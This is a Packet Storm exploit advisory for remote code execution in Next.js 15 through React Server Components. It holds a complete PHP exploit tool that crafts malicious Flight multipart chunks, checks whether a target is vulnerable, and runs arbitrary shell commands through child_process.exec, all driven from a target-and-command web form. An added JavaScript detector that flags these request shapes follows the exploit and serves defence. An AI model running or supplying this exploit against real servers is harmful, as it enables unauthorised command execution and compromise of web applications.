Next.js 15 Remote Code Execution

Published: 09 Feb 2026 00:00:00. Reported by indoushka. Type: packetstorm. Source: packetstorm.news

PHP proof-of-concept showing remote code execution in Next.js 15 via React Server Components.

Related

- GithubExploit: Exploit for Deserialization of Untrusted Data in Facebook React (31 Dec 2025 14:20)
- GithubExploit: Exploit for Deserialization of Untrusted Data in Facebook React (9 Dec 2025 06:46)
- GithubExploit: Exploit for CVE-2025-66478 (11 Dec 2025 01:49)
- GithubExploit: Exploit for CVE-2025-55182 (4 Dec 2025 01:26)
- GithubExploit: Exploit for CVE-2025-55182 (5 Dec 2025 17:47)
- GithubExploit: Exploit for Deserialization of Untrusted Data in Facebook React (7 Jan 2026 20:51)
- GithubExploit: Exploit for CVE-2025-66478 (30 May 2026 00:26)
- GithubExploit: Exploit for Deserialization of Untrusted Data in Facebook React (15 Dec 2025 14:56)
- GithubExploit: Exploit for Deserialization of Untrusted Data in Facebook React (6 Dec 2025 17:32)
- GithubExploit: Exploit for CVE-2025-55182 (5 Dec 2025 08:40)
=============================================================================================================================================
    | # Title     : Next.js 15 RCE Exploit                                                                                                      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |
    | # Vendor    : https://nextjs.org/blog/next-15                                                                                             |
    =============================================================================================================================================
    
    [+] References : https://packetstorm.news/files/id/212599/ & CVE-2025-55182, CVE-2025-66478
    
    [+] Summary    : A PHP-based proof-of-concept implementation demonstrating the critical Remote Code Execution vulnerability in React Server Components (RSC) Flight protocol, affecting React and Next.js applications
    
    [+] POC : http://127.0.0.1/poc.php
    
    <?php
    
    
    class ReactRCEExploit {
        private $targetUrl;
        private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
        
        public function __construct($targetUrl) {
            $this->targetUrl = rtrim($targetUrl, '/');
        }
        
        /**
         * Build a malicious multipart chunk
         */
        private function buildMaliciousChunk($refIdx, $reason, $getToken, $nodePayload) {
            $data = [
                'then' => "\${$refIdx}:then",
                'status' => 'resolved_model',
                'reason' => $reason,
                'value' => json_encode(['then' => '$B']),
                '_response' => [
                    '_prefix' => $nodePayload,
                    '_formData' => [
                        'get' => "\${$refIdx}:{$getToken}:constructor"
                    ]
                ]
            ];
            
            return json_encode($data);
        }
        
        /**
         * Get a random filler value
         */
        private function getRandomValue() {
            $values = ['""', '{}', '[]', 'null', 'undefined', 'true', 'false'];
            $randomString = bin2hex(random_bytes(8));
            $values[] = "\"{$randomString}\"";
            
            return $values[array_rand($values)];
        }
        
        /**
         * Build the POST data
         */
        private function buildPostData($nodePayload) {
            $randomReason = -rand(1, 9);
            $randomRefIdx = rand(0, 9);
            $getTokens = ['then', 'constructor'];
            $randomGetToken = $getTokens[array_rand($getTokens)];
            
            // Build the malicious chunk
            $chunk = $this->buildMaliciousChunk(
                $randomRefIdx, 
                $randomReason, 
                $randomGetToken, 
                $nodePayload
            );
            
            // Build the multipart body
            $boundary = '----WebKitFormBoundary' . bin2hex(random_bytes(16));
            $data = "--{$boundary}\r\n";
            $data .= "Content-Disposition: form-data; name=\"0\"\r\n\r\n";
            $data .= $chunk . "\r\n";
            
            $cycleLength = rand($randomRefIdx, 9);
            for ($i = 1; $i <= $cycleLength; $i++) {
                $value = ($i == $randomRefIdx) ? "\"\$@{$randomRefIdx}\"" : $this->getRandomValue();
                $data .= "--{$boundary}\r\n";
                $data .= "Content-Disposition: form-data; name=\"{$i}\"\r\n\r\n";
                $data .= $value . "\r\n";
            }
            
            $data .= "--{$boundary}--\r\n";
            
            return [
                'data' => $data,
                'boundary' => $boundary
            ];
        }
        
        /**
         * Send the payload
         */
        public function sendPayload($nodePayload) {
            $postData = $this->buildPostData($nodePayload);
            
            $headers = [
                'Next-Action: ',
                'Content-Type: multipart/form-data; boundary=' . $postData['boundary'],
                'User-Agent: ' . $this->userAgent
            ];
            
            $context = stream_context_create([
                'http' => [
                    'method' => 'POST',
                    'header' => implode("\r\n", $headers),
                    'content' => $postData['data'],
                    'ignore_errors' => true
                ]
            ]);
            
            $response = @file_get_contents($this->targetUrl, false, $context);
            
            if ($response === false) {
                return [
                    'success' => false,
                    'error' => 'Failed to connect to target'
                ];
            }
            
            // Extract response information
            $httpResponse = $http_response_header;
            $statusCode = $this->extractStatusCode($httpResponse);
            
            return [
                'success' => true,
                'status' => $statusCode,
                'headers' => $httpResponse,
                'body' => $response
            ];
        }
        
        /**
         * Extract the status code from the response
         */
        private function extractStatusCode($headers) {
            foreach ($headers as $header) {
                if (preg_match('/HTTP\/\d\.\d\s+(\d+)/', $header, $matches)) {
                    return (int)$matches[1];
                }
            }
            return 0;
        }
        
        /**
         * Check whether the vulnerability is present
         */
        public function checkVulnerability() {
            $randomId = bin2hex(random_bytes(8));
            $nodePayload = "throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/{$randomId};307;`});";
            
            $response = $this->sendPayload($nodePayload);
            
            if (!$response['success']) {
                return "Failed to connect to target";
            }
            
            if ($response['status'] == 303) {
                $headersText = implode("\n", $response['headers']);
                if (strpos($headersText, "/{$randomId};push") !== false) {
                    return "Vulnerable! The target appears to be exploitable.";
                }
            }
            
            return "The target does not appear to be vulnerable.";
        }
        
        /**
         * Execute a command
         */
        public function executeCommand($command) {
            // Sanitize the command (this is only an example; in practice it needs further hardening)
            $escapedCommand = escapeshellcmd($command);
            $nodePayload = "process.mainModule.require('child_process').exec(\"{$escapedCommand}\",{detached:true,stdio:'ignore'},function(){});";
            
            return $this->sendPayload($nodePayload);
        }
    }
    
    // Usage example
    if (isset($_GET['test'])) {
        header('Content-Type: text/plain; charset=utf-8');
        
        $target = isset($_GET['target']) ? $_GET['target'] : 'http://localhost:3000';
        $exploit = new ReactRCEExploit($target);
        
        if (isset($_GET['cmd'])) {
            // Execute the command (for testing purposes only)
            $result = $exploit->executeCommand($_GET['cmd']);
            echo "Command Execution Result:\n";
            print_r($result);
        } else {
            // Check for the vulnerability
            echo "Checking vulnerability...\n";
            echo $exploit->checkVulnerability();
        }
        
        exit;
    }
    ?>
    
    <!DOCTYPE html>
    <html>
    <head>
        <title>React RCE Test Tool</title>
        <meta charset="utf-8">
    </head>
    <body>
        <h1>React RCE Vulnerability Test</h1>
        <p><strong>Warning:</strong> For authorized security testing only!</p>
        
        <form method="GET">
            <input type="hidden" name="test" value="1">
            
            <label for="target">Target URL:</label><br>
            <input type="text" id="target" name="target" 
                   value="http://localhost:3000" size="50"><br><br>
            
            <label for="cmd">Command to execute (optional):</label><br>
            <input type="text" id="cmd" name="cmd" 
                   placeholder="id" size="50"><br><br>
            
            <input type="submit" value="Test Vulnerability">
        </form>
        
        <h2>Usage Examples:</h2>
        <ul>
            <li>Just check: <code>?test=1&target=http://example.com</code></li>
            <li>Test with command: <code>?test=1&target=http://example.com&cmd=whoami</code></li>
        </ul>
    </body>
    </html>
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
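The PoC above sends a multipart Server Action request (the Next-Action header plus numbered form parts) whose first part is a crafted Flight chunk carrying internal keys (_response, _prefix, _formData), a "$B" thenable and "$@N" self-references. The following is an added, defender-side example written for this page; it is not part of the indoushka advisory, nor Next.js or React code. It parses such a request and reports which of those indicators are present, so a WAF rule, middleware or log-review script can triage traffic while hosts are being updated to vendor-patched React and Next.js releases. The header names come from the PoC; the indicator list, the sample bodies, the action id and the placeholder string standing in for the executable payload are all constructed assumptions.

```javascript
// Added, defender-side example; not part of the indoushka advisory or of Next.js.
// It flags multipart Server Action requests that carry the Flight-protocol shapes
// the PoC above emits. All headers, bodies and the indicator list are constructed
// assumptions drawn from the PoC, not vendor-provided detection logic.

// Split a multipart/form-data body into { name, value } parts using its boundary.
function parseMultipart(body, boundary) {
  const parts = [];
  for (const raw of body.split(`--${boundary}`)) {
    const segment = raw.replace(/^\r\n/, '');
    // Skip the empty preamble and the closing "--" marker.
    if (segment === '' || segment.startsWith('--')) continue;
    const sep = segment.indexOf('\r\n\r\n');
    if (sep === -1) continue;
    const nameMatch = /name="([^"]*)"/.exec(segment.slice(0, sep));
    parts.push({
      name: nameMatch ? nameMatch[1] : '',
      value: segment.slice(sep + 4).replace(/\r\n$/, ''),
    });
  }
  return parts;
}

// Internal Flight/Response object keys that a browser client has no reason to send.
const INTERNAL_KEYS = ['_response', '_prefix', '_formData'];

// Recursively scan a decoded part for the indicators; nested JSON strings are
// decoded too, because the PoC nests a second JSON document inside "value".
function scanValue(node, report) {
  if (Array.isArray(node)) {
    node.forEach((item) => scanValue(item, report));
  } else if (node && typeof node === 'object') {
    for (const [key, child] of Object.entries(node)) {
      if (INTERNAL_KEYS.includes(key)) report(`internal key "${key}"`);
      scanValue(child, report);
    }
  } else if (typeof node === 'string') {
    if (node === '$B') report('blob reference "$B" used as a thenable');
    if (/^\$@\d+/.test(node)) report(`chunk self-reference "${node}"`);
    if (/:constructor$/.test(node)) report(`reference resolving to "${node}"`);
    if (/^[\[{]/.test(node)) {
      try { scanValue(JSON.parse(node), report); } catch (e) { /* plain text, not JSON */ }
    }
  }
}

// Inspect one request. Returns { suspicious, reasons } so the caller can log,
// block or rate-limit as local policy dictates.
function inspectServerActionRequest(headers, body) {
  const reasons = [];
  const h = Object.fromEntries(
    Object.entries(headers).map(([k, v]) => [k.toLowerCase(), String(v)]),
  );
  // Only Server Action posts carry Next-Action; everything else is out of scope.
  if (!('next-action' in h)) return { suspicious: false, reasons };
  if (h['next-action'].trim() === '') reasons.push('empty Next-Action header');
  const boundary = /boundary=([^;]+)/.exec(h['content-type'] || '');
  if (boundary) {
    for (const part of parseMultipart(body, boundary[1])) {
      let decoded;
      try { decoded = JSON.parse(part.value); } catch (e) { continue; }
      scanValue(decoded, (why) => reasons.push(`part "${part.name}": ${why}`));
    }
  }
  return { suspicious: reasons.length > 0, reasons };
}

// --- constructed samples (not captured traffic) ---------------------------
const BOUNDARY = '----WebKitFormBoundaryEXAMPLE0123456789';

function buildMultipart(fields) {
  let body = '';
  for (const [name, value] of fields) {
    body += `--${BOUNDARY}\r\nContent-Disposition: form-data; name="${name}"\r\n\r\n${value}\r\n`;
  }
  return `${body}--${BOUNDARY}--\r\n`;
}

// Same chunk layout as the PoC's buildMaliciousChunk, with the executable
// payload replaced by an inert placeholder string.
const CRAFTED_CHUNK = JSON.stringify({
  then: '$3:then',
  status: 'resolved_model',
  reason: -4,
  value: JSON.stringify({ then: '$B' }),
  _response: { _prefix: 'PLACEHOLDER_NOT_CODE', _formData: { get: '$3:then:constructor' } },
});
const CRAFTED_BODY = buildMultipart([['0', CRAFTED_CHUNK], ['1', 'null'], ['2', '{}'], ['3', '"$@3"']]);
const CRAFTED_HEADERS = {
  'Next-Action': '',
  'Content-Type': `multipart/form-data; boundary=${BOUNDARY}`,
};

// An ordinary Server Action call: a (made-up) action id plus plain JSON arguments.
const BENIGN_BODY = buildMultipart([['0', '["hello",42]'], ['1', '{"id":"abc"}']]);
const BENIGN_HEADERS = {
  'Next-Action': 'a1b2c3d4e5f60718',
  'Content-Type': `multipart/form-data; boundary=${BOUNDARY}`,
};

console.log(inspectServerActionRequest(CRAFTED_HEADERS, CRAFTED_BODY));
console.log(inspectServerActionRequest(BENIGN_HEADERS, BENIGN_BODY));
```

The check is deliberately structural rather than signature-based: the PoC randomises the reference index, the reason value and the filler parts, so matching on a fixed string would miss trivial variants, whereas internal Flight keys and "$@" self-references never appear in a legitimate action argument list. Treat a hit as a reason to inspect and block the request, not as proof of compromise; the durable fix remains updating to the vendor's patched React and Next.js releases.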

Scores (current as of 09 Feb 2026 00:00):
Vulners AI Score: 6.4 (Medium risk)
CVSS 3.1: 10
EPSS: 0.84489
SSVC: not listed